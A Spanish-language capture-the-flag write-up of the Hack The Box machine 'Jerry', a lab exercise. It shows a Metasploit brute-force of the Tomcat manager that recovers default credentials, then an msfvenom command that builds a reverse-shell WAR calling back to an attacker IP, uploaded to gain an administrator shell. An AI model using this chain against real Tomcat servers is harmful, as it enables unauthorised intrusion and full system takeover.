Hoy os traigo el writeup de como resolver la máquina Jerry de Hackthebox. Como podéis ver la dificultad de la máquina es fácil.
[ 00 – Recon]
En primer lugar realizamos un escaneo de puertos para comprobar que servicios están corriendo en la máquina.
Vemos que se está ejecutando un apache tomcat en el puerto 8080.
[ 01 – Getting Access]
Para poder acceder a la consola de gestión del tomcat, necesitamos un usuario y una contraseña. Para ello vamos a hacer fuerza bruta con el módulo de metasploit que contiene las contraseñas más típicas y por defecto usadas en tomcat:
use auxiliary/scanner/http/tomcat_mgr_login
Tenemos suerte y vemos que encontramos las credenciales tomcat:s3cret. Una vez dentro de la consola de administración comprobamos que SO está ejecutando y la arquitectura del mismo.
Se trata de un windows Server 2012 de 64 bits. Vamos a subir una shell mediante un fichero war. Para ello generamos la shell mediante el siguiente comando, utilizando msfvenom:
msfvenom -p windows/x64/shell/reverse_tcp LPORT=4444 LHOST=10.10.15.77 -f war > final.war
Ahora vamos al gestor de aplicaciones y subimos nuestro fichero final.war. Tendremos que desempaquetar el fichero en local, para comprobar el nombre que se ha generado para el fichero jsp de la shell.
Ponemos a escuchar un netcat en el puerto que hemos definido en el comando, en este caso el puerto 4444, y visitamos el fichero a través del navegador para que se realice la conexión, y así obtener Shell:
[ 02 – Priv. Esc.]
En este caso no hace falta escalar privilegios porque la reverse shell que hemos obtenido es de usuario adminsitrador
Y podríamos leer las flags tanto de user como de root.